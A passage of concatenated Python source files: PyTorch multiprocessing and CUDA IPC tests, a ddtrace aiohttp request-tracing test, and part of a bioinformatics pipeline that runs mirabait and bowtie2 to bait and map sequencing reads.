# test is no more than 4 higher than the 10th available at the
# start. This attempts to catch file descriptor leaks, but allows
# one-off initialization that may use up a file descriptor
# TODO: Disabled because this check is too flaky
# available_fds = self._get_next_fds(10)
# self.test_case.assertLessEqual(
# available_fds[-1] - self.next_fds[-1], 5)
self.test_case.assertFalse(self.has_shm_files())
return False
def check_pid(self, pid):
self.checked_pids.append(pid)
def _get_next_fds(self, n=1):
# dup uses the lowest-numbered unused descriptor for the new descriptor
fds = [os.dup(0) for i in range(n)]
for fd in fds:
os.close(fd)
return fds
def has_shm_files(self, wait=True):
if not HAS_SHM_FILES:
return False
result = self._has_shm_files()
if result and mp.get_sharing_strategy() == 'file_system' and wait:
time.sleep(0.5)
return self._has_shm_files()
return result
def _has_shm_files(self):
gc.collect()
names = ['torch_' + str(pid) for pid in self.checked_pids]
for filename in os.listdir('/dev/shm'):
for name in names:
if filename.startswith(name):
return True
return False
@unittest.skipIf(TEST_WITH_TSAN, "TSAN is not fork-safe since we're forking in a multi-threaded environment")
class TestMultiprocessing(TestCase):
def tearDown(self):
# This will keep tests isolated from each-other
if torch.cuda.is_available():
torch.cuda.ipc_collect()
def _test_sharing(self, ctx=mp, device='cpu', dtype=torch.float, repeat=1):
def test_fill():
x = torch.zeros(5, 5).to(device, dtype)
q = ctx.Queue()
e = ctx.Event()
data = [x, x[:, 1]]
q.put(data)
p = ctx.Process(target=simple_fill, args=(q, e))
p.daemon = True
lc.check_pid(p.pid)
p.start()
e.wait(10)
self.assertTrue(e.is_set())
self.assertTrue(data[0].eq(4).all())
self.assertTrue(data[1].eq(4).all())
p.join(1)
self.assertFalse(p.is_alive())
def test_receive():
q = ctx.Queue()
e = ctx.Event()
p = ctx.Process(target=send_tensor, args=(q, e, device, dtype))
p.daemon = True
lc.check_pid(p.pid)
p.start()
t1 = q.get()
t2 = q.get()
self.assertTrue(t1.eq(1).all())
s1 = t1.storage()
s2 = t2.storage()
self.assertEqual(type(s1), type(s2))
self.assertEqual(s1.data_ptr(), s1.data_ptr())
self.assertEqual(s1, s2)
# We need to delete this tensors to allow producer (child process)
# collect them properly
del t1, t2
e.set()
p.join(1)
self.assertFalse(p.is_alive())
with leak_checker(self) as lc:
for _ in range(repeat):
test_fill()
test_receive()
def _test_preserve_sharing(self, ctx=mp, repeat=1):
def do_test():
x = torch.randn(5, 5)
data = [x.storage(), x, x[2], x[:, 1]]
q = ctx.Queue()
q.put(data)
new_data = q.get(timeout=1)
self.assertEqual(new_data, data, atol=0, rtol=0)
storage_cdata = data[0]._cdata
self.assertEqual(new_data[0]._cdata, storage_cdata)
for t in new_data[1:]:
self.assertEqual(t.storage()._cdata, storage_cdata)
with leak_checker(self):
for _ in range(repeat):
do_test()
def _test_pool(self, ctx=mp, repeat=1):
def do_test():
p = ctx.Pool(2)
for proc in p._pool:
lc.check_pid(proc.pid)
buffers = [torch.zeros(2, 2) for i in range(4)]
results = p.map(simple_pool_fill, buffers, 1)
self.assertEqual(len(results), len(buffers))
for r in results:
self.assertEqual(r, torch.ones(2, 2) * 5, atol=0, rtol=0)
for b in buffers:
self.assertEqual(b, torch.ones(2, 2) * 4, atol=0, rtol=0)
p.close()
p.join()
with leak_checker(self) as lc:
for _ in range(repeat):
do_test()
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
@unittest.skipIf(TEST_WITH_ASAN,
"seems to hang with ASAN, see https://github.com/pytorch/pytorch/issues/5326")
def test_fd_sharing(self):
self._test_sharing(repeat=TEST_REPEATS)
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
def test_fd_preserve_sharing(self):
self._test_preserve_sharing(repeat=TEST_REPEATS)
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
def test_fd_pool(self):
self._test_pool(repeat=TEST_REPEATS)
@unittest.skipIf(TEST_WITH_ASAN,
"seems to hang with ASAN, see https://github.com/pytorch/pytorch/issues/5326")
def test_fs_sharing(self):
with fs_sharing():
self._test_sharing(repeat=TEST_REPEATS)
def test_fs_preserve_sharing(self):
with fs_sharing():
self._test_preserve_sharing(repeat=TEST_REPEATS)
def test_fs_pool(self):
with fs_sharing():
self._test_pool(repeat=TEST_REPEATS)
@unittest.skipIf(not HAS_SHM_FILES, "don't not how to check if shm files exist")
def test_fs(self):
def queue_put():
x = torch.DoubleStorage(4)
q = mp.Queue()
self.assertFalse(lc.has_shm_files())
q.put(x)
time.sleep(0.05) # queue serializes asynchronously
self.assertTrue(lc.has_shm_files(wait=False))
q.get()
with fs_sharing(), leak_checker(self) as lc:
for _ in range(TEST_REPEATS):
queue_put()
def test_inherit_tensor(self):
t = torch.zeros(5, 5)
p = SubProcess(t.share_memory_())
p.start()
p.join(2)
if p.exitcode is None:
print("test_inherit_tensor: SubProcess too slow")
else:
self.assertEqual(t, torch.ones(5, 5) * 3, atol=0, rtol=0)
@unittest.skipIf(IS_WINDOWS, "Test needs to use fork multiprocessing")
def test_autograd_errors(self):
ctx = mp.get_context('fork')
simple_autograd_function()
# Autograd only uses thread when GPUs are involved
if torch.cuda.is_available():
with self.assertRaisesRegex(RuntimeError, r'Unable to handle autograd'):
with ctx.Pool(3) as pool:
pool.map(simple_autograd_function, [1, 2, 3])
else:
with ctx.Pool(3) as pool:
pool.map(simple_autograd_function, [1, 2, 3])
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Test needs to use spawn multiprocessing")
def test_autograd_fine_with_spawn(self):
ctx = mp.get_context('spawn')
simple_autograd_function()
with ctx.Pool(3) as pool:
pool.map(simple_autograd_function, [1, 2, 3])
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_simple(self):
torch.cuda.FloatTensor([1]) # initialize CUDA outside of leak checker
self._test_sharing(mp.get_context('spawn'), 'cuda', torch.float)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_memory_allocation(self):
ctx = mp.get_context('spawn')
q = ctx.Queue()
e = ctx.Event()
p = ctx.Process(target=send_and_delete_tensors, args=(q, e, 'cuda', torch.int, 5))
p.start()
t = []
for _ in range(5):
t.append(q.get())
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(t[0], torch.full([5], 0.))
del t
e.set()
p.join(1)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_ipc_deadlock(self):
ctx = mp.get_context('spawn')
queue = ctx.Queue(1)
processes = dict(
a=ctx.Process(target=_test_cuda_ipc_deadlock_actor, args=(queue, 100)),
l=ctx.Process(target=_test_cuda_ipc_deadlock_learner, args=(queue, 100)))
for p in processes.values():
p.start()
for p in processes.values():
p.join(10)
for p in processes.values():
self.assertFalse(p.is_alive())
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_send_many(self, name=None, size=5, count=100000):
ctx = mp.get_context('spawn')
q1 = ctx.Queue()
q2 = ctx.Queue()
q3 = ctx.Queue()
e1 = ctx.Event()
e2 = ctx.Event()
e3 = ctx.Event()
p1 = ctx.Process(target=send_and_delete_tensors, args=(q1, e1, 'cuda', torch.long, count, size))
p2 = ctx.Process(target=receive_and_send, args=(q1, q2, e2, count))
p3 = ctx.Process(target=receive_and_send_sum, args=(q2, q3, e3, 'cuda', torch.long, count, size))
p1.start()
p2.start()
p3.start()
result = q3.get()
self.assertEqual(result[0], int(count * (count - 1) / 2))
del result
e1.set()
e2.set()
e3.set()
p1.join(1)
p2.join(1)
p3.join(1)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
@unittest.skipIf(not TEST_MULTIGPU, 'found only 1 GPU')
def test_cuda_small_tensors(self):
# Check multiple small tensors which will likely use the same
# underlying cached allocation
ctx = mp.get_context('spawn')
tensors = []
for i in range(5):
device = i % 2
tensors += [torch.arange(i * 5., (i + 1) * 5).cuda(device)]
inq = ctx.Queue()
outq = ctx.Queue()
inq.put(tensors)
p = ctx.Process(target=sum_tensors, args=(inq, outq))
p.start()
results = []
for _ in range(5):
results.append(outq.get())
p.join()
for i, _tensor in enumerate(tensors):
v, device, tensor_size, storage_size = results[i]
self.assertEqual(v, torch.arange(i * 5., (i + 1) * 5).sum())
self.assertEqual(device, i % 2)
self.assertEqual(tensor_size, 5)
# You might think this should be the case, but it's not! After
# data from the CUDA caching allocator goes through IPC, the
# size of the storage is the size of the *cached cudaMalloc for
# the entire memory block* of the storage, not just the storage.
# See Note [CUDA IPC and the caching allocator] for more info
#
# self.assertEqual(storage_size, 5)
# Collect current process (producer) files, make sure nothing holds
# ref to the sent tensors
del _tensor
del tensors
# We need to collect, as CUDA MP implementation holds one shared
# memory 'file' for performance reason
torch.cuda.ipc_collect()
@unittest.skipIf(IS_WINDOWS, 'not applicable to Windows (only fails with fork)')
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_cuda_bad_call(self):
# Initialize CUDA
t = torch.zeros(5, 5).cuda().cpu()
inq = mp.Queue()
outq = mp.Queue()
p = mp.Process(target=queue_get_exception, args=(inq, outq))
p.start()
inq.put(t)
p.join()
self.assertIsInstance(outq.get(), RuntimeError)
@unittest.skipIf(IS_WINDOWS, 'not applicable to Windows (only fails with fork)')
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_wrong_cuda_fork(self):
stderr = TestCase.runWithPytorchAPIUsageStderr("""\
import torch
from torch.multiprocessing import Process
def run(rank):
torch.cuda.set_device(rank)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
# it would work fine without the line below
x = torch.rand(20, 2).cuda()
p = Process(target=run, args=(rank,))
p.start()
processes.append(p)
for p in processes:
p.join()
""")
self.assertRegex(stderr, "Cannot re-initialize CUDA in forked subprocess.")
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event(self):
ctx = mp.get_context('spawn')
queue = ctx.Queue()
ready = ctx.Event()
done = ctx.Event()
p = ctx.Process(target=cuda_multiply_two, args=(queue, ready, done))
p.start()
ready.wait()
with torch.cuda.stream(torch.cuda.Stream()):
tensor = torch.cuda.FloatTensor([1, 1, 1, 1])
# Use a sleep kernel to test events. Without the event, the
# multiply happens before the add.
event = torch.cuda.Event(interprocess=True)
torch.cuda._sleep(20000000) # about 30 ms
tensor.add_(1)
event.record()
queue.put((event, tensor))
done.wait() # must wait until subprocess records event
event.synchronize()
self.assertEqual(list(tensor), [4, 4, 4, 4])
p.join()
@staticmethod
def _test_event_multiprocess_child(event, p2c, c2p):
c2p.put(0) # notify parent child is ready
p2c.get() # wait for record in parent
event.synchronize()
c2p.put(1) # notify parent synchronization is done
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event_multiprocess(self):
event = torch.cuda.Event(enable_timing=False, interprocess=True)
self.assertTrue(event.query())
ctx = mp.get_context('spawn')
p2c = ctx.SimpleQueue()
c2p = ctx.SimpleQueue()
p = ctx.Process(
target=TestMultiprocessing._test_event_multiprocess_child,
args=(event, p2c, c2p))
p.start()
c2p.get() # wait for until child process is ready
torch.cuda._sleep(50000000) # spin for about 50 ms
event.record()
p2c.put(0) # notify child event is recorded
self.assertFalse(event.query())
c2p.get() # wait for synchronization in child
self.assertTrue(event.query())
p.join()
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
@unittest.skipIf(not TEST_MULTIGPU, 'found only 1 GPU')
def test_event_handle_multi_gpu(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
e0 = torch.cuda.Event(enable_timing=False, interprocess=True)
with torch.cuda.device(d1):
# create handle on different device from un-recorded event
e0.ipc_handle()
with torch.cuda.device(d0):
e1 = torch.cuda.Event(enable_timing=False, interprocess=True)
stream = torch.cuda.Stream()
torch.cuda._sleep(50000000) # spin for about 50 ms
e1.record(stream)
with torch.cuda.device(d1):
# create handle on different device from recorded event
e1.ipc_handle()
@staticmethod
def _test_event_handle_importer_consumer(handle, p2c, c2p):
e1 = torch.cuda.Event.from_ipc_handle(0, handle)
c2p.put(0) # notify parent child is ready
p2c.get() # wait for record in parent
e1.synchronize()
c2p.put(1) # nofity synchronization is done in child
p2c.get() # wait for parent to finish before destructing child event
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event_handle_importer(self):
e0 = torch.cuda.Event(enable_timing=False, interprocess=True)
self.assertTrue(e0.query())
ctx = mp.get_context('spawn')
p2c = ctx.SimpleQueue()
c2p = ctx.SimpleQueue()
p = ctx.Process(
target=TestMultiprocessing._test_event_handle_importer_consumer,
args=(e0.ipc_handle(), p2c, c2p))
p.start()
c2p.get() # wait for child to become ready
torch.cuda._sleep(50000000) # spin for about 50 ms
e0.record()
p2c.put(0) # notify child event is recorded
self.assertFalse(e0.query())
c2p.get() # wait for synchronization in child
self.assertTrue(e0.query())
p2c.put(1) # notify child that parent is done
p.join()
@staticmethod
def _test_event_handle_exporter_consumer(handle, p2c, c2p):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
e1 = torch.cuda.Event.from_ipc_handle(
torch.cuda.current_device(), handle)
torch.cuda._sleep(50000000) # spin for about 50 ms
e1.record()
c2p.put(0)
# wait for parent process finished synchronization before
# destructing e1
p2c.get()
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_event_handle_exporter(self):
e0 = torch.cuda.Event(enable_timing=False, interprocess=True)
ctx = mp.get_context('spawn')
p2c = ctx.SimpleQueue()
c2p = ctx.SimpleQueue()
p = ctx.Process(
target=TestMultiprocessing._test_event_handle_exporter_consumer,
args=(e0.ipc_handle(), p2c, c2p))
p.start()
# wait for event in child process is recorded
c2p.get()
self.assertFalse(e0.query())
e0.synchronize()
self.assertTrue(e0.query())
p2c.put(0)
p.join()
def _test_empty_tensor_sharing(self, dtype, device):
q = mp.Queue()
empty = torch.tensor([], dtype=dtype, device=device)
q.put(empty)
out = q.get(timeout=1)
self.assertEqual(out, empty)
def test_empty_tensor_sharing(self):
self._test_empty_tensor_sharing(torch.float32, torch.device('cpu'))
self._test_empty_tensor_sharing(torch.int64, torch.device('cpu'))
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_empty_tensor_sharing_cuda(self):
self._test_empty_tensor_sharing(torch.float32, torch.device('cuda'))
self._test_empty_tensor_sharing(torch.int64, torch.device('cuda'))
def _test_autograd_sharing(self, var, ctx=mp, is_parameter=False):
device = 'cuda' if var.is_cuda else 'cpu'
ready = ctx.Event()
master_modified = ctx.Event()
queue = ctx.Queue()
p = ctx.Process(target=autograd_sharing, args=(queue, ready, master_modified, device, is_parameter))
p.daemon = True
p.start()
# This would cause an error if we tried to serialize the hooks,
# because it's a closure and pickle doesn't support closures.
@torch.utils.hooks.unserializable_hook
def hook(*unused):
pass
if var.requires_grad:
var.register_hook(hook)
var._grad = torch.zeros(5, 5, device=device)
queue.put(var)
ready.wait()
var.data[0, 0] = 1000
var.grad.data[:] = torch.ones(5, 5, device=device) * 4
master_modified.set()
worker_ok = queue.get()
self.assertTrue(worker_ok)
self.assertEqual(var.data, torch.ones(5, 5, device=device))
self.assertEqual(var.grad.data, torch.ones(5, 5, device=device) * 4)
p.join(1)
self.assertFalse(p.is_alive())
# Check sharing a cudaMalloc allocation with different types of storage.
# (Issue #11422)
def _test_mixed_types_cuda_sharing(self, ctx=mp):
all_ones = torch.ones(2, 2).float()
all_zeros = torch.zeros(2, 2).byte()
queue = ctx.Queue()
event = ctx.Event()
p = ctx.Process(target=mixed_type_producer, args=(queue, event))
p.start()
for _ in range(10):
float_tensor = queue.get()
byte_tensor = queue.get()
self.assertEqual(float_tensor, all_ones)
self.assertEqual(byte_tensor, all_zeros)
del float_tensor, byte_tensor
event.set()
time.sleep(5)
p.join()
def test_variable_sharing(self):
for requires_grad in [True, False]:
var = torch.arange(1., 26).view(5, 5).requires_grad_(requires_grad)
self._test_autograd_sharing(var)
# See https://github.com/pytorch/pytorch/issues/14997
@unittest.skipIf(TEST_WITH_ASAN,
"non-deterministically hangs with ASAN")
def test_leaf_variable_sharing(self):
devices = ['cpu']
if torch.cuda.is_available() and not NO_MULTIPROCESSING_SPAWN and TEST_CUDA_IPC:
devices.append('cuda')
for device in devices:
for requires_grad in [True, False]:
var = torch.arange(1., 26, device=device).view(5, 5).requires_grad_(requires_grad)
self.assertTrue(var.is_leaf)
ctx = mp.get_context('spawn') if device == 'cuda' else mp
ready = ctx.Event()
queue = ctx.Queue()
p = ctx.Process(target=requires_grad_variable_sharing, args=(queue, ready))
p.daemon = True
p.start()
queue.put(var)
ready.wait()
worker_requires_grad = queue.get()
self.assertTrue(worker_requires_grad == requires_grad)
def test_non_leaf_variable_sharing(self):
devices = ['cpu'] if not torch.cuda.is_available() else ['cpu', 'cuda']
for device in devices:
var0 = torch.arange(1., 26, device=device).view(5, 5).requires_grad_(True)
var = var0 * 2
# Don't use a regular Queue; it uses a background thread (which
# means we can't catch the exceptions)
queue = mp.SimpleQueue()
self.assertRaisesRegex(RuntimeError, r'requires_grad', lambda: queue.put(var))
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_variable_sharing(self):
for requires_grad in [True, False]:
var = torch.arange(1., 26, device='cuda').view(5, 5).requires_grad_(requires_grad)
self._test_autograd_sharing(var, mp.get_context('spawn'))
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_mixed_types_cuda_sharing(self):
self._test_mixed_types_cuda_sharing(mp.get_context('spawn'))
def test_parameter_sharing(self):
param = Parameter(torch.arange(1., 26).view(5, 5))
self._test_autograd_sharing(param, is_parameter=True)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_cuda_parameter_sharing(self):
param = Parameter(torch.arange(1., 26, device='cuda').view(5, 5))
self._test_autograd_sharing(param, mp.get_context('spawn'), is_parameter=True)
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_integer_parameter_serialization_cpu(self):
self._test_integer_parameter_serialization(device='cpu')
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(not TEST_CUDA_IPC, 'CUDA IPC not available')
def test_integer_parameter_serialization_cuda(self):
self._test_integer_parameter_serialization(device='cuda')
def _test_integer_parameter_serialization(self, device):
param = torch.nn.Parameter(
torch.tensor(0, dtype=torch.int64, device=device),
requires_grad=False
)
ctx = mp.get_context('spawn')
p = ctx.Process(target=integer_parameter_serialization, args=(param,))
p.start()
p.join()
self.assertEqual(
0, p.exitcode,
msg=f'Failed to serialize successfully for "{device}" device!'
)
def test_empty_shared(self):
t = torch.tensor([])
t.share_memory_()
def _test_is_shared(self):
t = torch.randn(5, 5)
self.assertFalse(t.is_shared())
t.share_memory_()
self.assertTrue(t.is_shared())
@unittest.skipIf(platform == 'darwin', "file descriptor strategy is not supported on macOS")
def test_is_shared(self):
self._test_is_shared()
def test_fs_is_shared(self):
with fs_sharing():
self._test_is_shared()
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA not available')
def test_is_shared_cuda(self):
t = torch.randn(5, 5).cuda()
self.assertTrue(t.is_shared())
if __name__ == '__main__':
run_tests()
|
test_request.py
|
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from aiohttp.test_utils import unittest_run_loop
from ddtrace.pin import Pin
from ddtrace.contrib.aiohttp.patch import patch, unpatch
from ddtrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
from ... import assert_is_measured
class TestRequestTracing(TraceTestCase):
"""
Ensures that the trace includes all traced components.
"""
def enable_tracing(self):
# enabled tracing:
# * middleware
# * templates
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
request = yield from self.client.request("GET", "/template/")
assert 200 == request.status
yield from request.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
template_span = traces[0][1]
# request
assert "aiohttp-web" == request_span.service
assert "aiohttp.request" == request_span.name
assert "GET /template/" == request_span.resource
# template
assert "aiohttp-web" == template_span.service
assert "aiohttp.template" == template_span.name
assert "aiohttp.template" == template_span.resource
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
# it should handle multiple requests using the same loop
def make_requests():
url = self.client.make_url("/delayed/")
response = request.urlopen(str(url)).read().decode("utf-8")
assert "Done" == response
# blocking call executed in different threads
threads = [threading.Thread(target=make_requests) for _ in range(10)]
for t in threads:
t.daemon = True
t.start()
# we should yield so that this loop can handle
# threads' requests
yield from asyncio.sleep(0.5)
for t in threads:
t.join(timeout=0.5)
# the trace is created
traces = self.tracer.writer.pop_traces()
assert 10 == len(traces)
assert 1 == len(traces[0])
@unittest_run_loop
@asyncio.coroutine
@TraceTestCase.run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_user_specified_service(self):
"""
When a service name is specified by the user
The aiohttp integration should use it as the service name
"""
request = yield from self.client.request("GET", "/template/")
yield from request.text()
traces = self.tracer.writer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
assert request_span.service == "mysvc"
template_span = traces[0][1]
assert template_span.service == "mysvc"
|
sippingmethods.py
|
#!/usr/bin/env python
from glob import glob
from subprocess import call
from threading import Thread
from Bio.Sequencing.Applications import *
from accessoryfunctions.accessoryFunctions import *
from accessoryfunctions.metadataprinter import *
from .bowtie import *
from io import StringIO
__author__ = 'adamkoziol'
class Sippr(object):
def targets(self):
printtime('Performing analysis with {} targets folder'.format(self.analysistype), self.start)
if self.pipeline:
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
setattr(sample, self.analysistype, GenObject())
# Set attributes
try:
sample[self.analysistype].targetpath = \
os.path.join(self.targetpath, self.analysistype, sample.mash.closestrefseqgenus, '')
except KeyError:
sample[self.analysistype].targetpath = \
os.path.join(self.targetpath, self.analysistype, sample.general.closestrefseqgenus, '')
# Ignore any species that do not match the desired species e.g. Listeria monocytogenes is acceptable
# while Listeria grayi is not. Right now, this sets the best assembly file to 'NA' to get the script
# to ignore this isolate, but something more fleshed out may be required in the future
for genus, species in self.taxonomy.items():
try:
if genus == sample.mash.closestrefseqgenus and species != sample.mash.closestrefseqspecies:
sample.general.bestassemblyfile = 'NA'
except KeyError:
pass
# There is a relatively strict databasing scheme necessary for the custom targets. Eventually,
# there will be a helper script to combine individual files into a properly formatted combined file
try:
sample[self.analysistype].baitfile = glob('{}*.fasta'
.format(sample[self.analysistype].targetpath))[0]
# If the fasta file is missing, raise a custom error
except IndexError as e:
# noinspection PyPropertyAccess
e.args = ['Cannot find the combined fasta file in {}. Please note that the file must have a '
'.fasta extension'.format(sample[self.analysistype].targetpath)]
if os.path.isdir(sample[self.analysistype].targetpath):
raise
else:
sample.general.bestassemblyfile = 'NA'
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Create the hash file of the baitfile
targetbase = sample[self.analysistype].baitfile.split('.')[0]
sample[self.analysistype].hashfile = targetbase + '.mhs.gz'
sample[self.analysistype].hashcall = 'cd {} && mirabait -b {} -k 19 -K {}'\
.format(sample[self.analysistype].targetpath,
sample[self.analysistype].baitfile,
sample[self.analysistype].hashfile)
if not os.path.isfile(sample[self.analysistype].hashfile):
call(sample[self.analysistype].hashcall, shell=True, stdout=self.devnull, stderr=self.devnull)
# Ensure that the hash file was successfully created
assert os.path.isfile(sample[self.analysistype].hashfile), \
u'Hashfile could not be created for the target file {0!r:s}'.format(
sample[self.analysistype].baitfile)
sample[self.analysistype].outputdir = os.path.join(sample.run.outputdirectory, self.analysistype)
sample[self.analysistype].baitedfastq = \
'{}/{}_targetMatches.fastq'.format(sample[self.analysistype].outputdir, self.analysistype)
else:
# There is a relatively strict databasing scheme necessary for the custom targets. Eventually, there will
# be a helper script to combine individual files into a properly formatted combined file
try:
self.baitfile = glob('{}*.fasta'.format(self.targetpath))[0]
# If the fasta file is missing, raise a custom error
except IndexError:
# Combine any .tfa files in the directory into a combined targets .fasta file
from Bio import SeqIO
tfafiles = glob(os.path.join(self.targetpath, '*.tfa'))
if tfafiles:
with open(os.path.join(self.targetpath, 'combinedtargets.fasta'), 'wb') as combined:
for tfafile in tfafiles:
for record in SeqIO.parse(tfafile, 'fasta'):
SeqIO.write(record, combined, 'fasta')
try:
self.baitfile = glob('{}*.fasta'.format(self.targetpath))[0]
except IndexError as e:
# noinspection PyPropertyAccess
e.args = ['Cannot find the combined fasta file in {}. Please note that the file must have a '
'.fasta extension'.format(self.targetpath)]
raise
# Create the hash file of the baitfile
targetbase = self.baitfile.split('.')[0]
self.hashfile = targetbase + '.mhs.gz'
self.hashcall = 'cd {} && mirabait -b {} -k 19 -K {}'.format(self.targetpath, self.baitfile, self.hashfile)
if not os.path.isfile(self.hashfile):
call(self.hashcall, shell=True, stdout=self.devnull, stderr=self.devnull)
# Ensure that the hash file was successfully created
assert os.path.isfile(self.hashfile), u'Hashfile could not be created for the target file {0!r:s}' \
.format(self.baitfile)
for sample in self.runmetadata:
setattr(sample, self.analysistype, GenObject())
# Set attributes
sample[self.analysistype].baitfile = self.baitfile
sample[self.analysistype].hashfile = self.hashfile
sample[self.analysistype].hashcall = self.hashcall
sample[self.analysistype].targetpath = self.targetpath
sample[self.analysistype].outputdir = os.path.join(sample.run.outputdirectory, self.analysistype)
sample[self.analysistype].baitedfastq = '{}/{}_targetMatches.fastq'.format(sample[self.analysistype]
.outputdir,
self.analysistype)
# Bait
self.baiting()
def baiting(self):
# Perform baiting
printtime('Performing kmer baiting of fastq files with {} targets'.format(self.analysistype), self.start)
# Create and start threads for each fasta file in the list
for i in range(len(self.runmetadata)):
# Send the threads to the bait method
threads = Thread(target=self.bait, args=())
# Set the daemon to true - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Add the sample to the queue
self.baitqueue.put(sample)
self.baitqueue.join()
# Run the bowtie2 read mapping module
self.mapping()
def bait(self):
"""
Runs mirabait on the fastq files
"""
while True:
sample = self.baitqueue.get()
# Create the folder (if necessary)
make_path(sample[self.analysistype].outputdir)
# Make the system call
if len(sample.general.fastqfiles) == 2:
sample[self.analysistype].mirabaitcall = 'mirabait -c -B {} -t 4 -o {} -p {} {}' \
.format(sample[self.analysistype].hashfile, sample[self.analysistype].baitedfastq,
sample.general.fastqfiles[0], sample.general.fastqfiles[1])
else:
sample[self.analysistype].mirabaitcall = 'mirabait -c -B {} -t 4 -o {} {}' \
.format(sample[self.analysistype].hashfile, sample[self.analysistype].baitedfastq,
sample.general.fastqfiles[0])
# Run the system call (if necessary)
if not os.path.isfile(sample[self.analysistype].baitedfastq):
call(sample[self.analysistype].mirabaitcall, shell=True, stdout=self.devnull, stderr=self.devnull)
self.baitqueue.task_done()
def mapping(self):
printtime('Performing reference mapping', self.start)
for i in range(len(self.runmetadata)):
# Send the threads to
threads = Thread(target=self.map, args=())
# Set the daemon to True - something to do with thread management
threads.setDaemon(True)
# Start the threading
threads.start()
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
# Set the path/name for the sorted bam file to be created
sample[self.analysistype].sortedbam = '{}/{}_sorted.bam'.format(sample[self.analysistype].outputdir,
self.analysistype)
# Remove the file extension of the bait file for use in the indexing command
sample[self.analysistype].baitfilenoext = sample[self.analysistype].baitfile.split('.')[0]
# Use bowtie2 wrapper to create index the target file
bowtie2build = Bowtie2BuildCommandLine(reference=sample[self.analysistype].baitfile,
bt2=sample[self.analysistype].baitfilenoext,
**self.builddict)
# Use samtools wrapper to set up the bam sorting command
samsort = SamtoolsSortCommandline(input=sample[self.analysistype].sortedbam,
o=True,
out_prefix="-")
samtools = [
# When bowtie2 maps reads to all possible locations rather than choosing a 'best' placement, the
# SAM header for that read is set to 'secondary alignment', or 256. Please see:
# http://davetang.org/muse/2014/03/06/understanding-bam-flags/ The script below reads in the stdin
# and subtracts 256 from headers which include 256
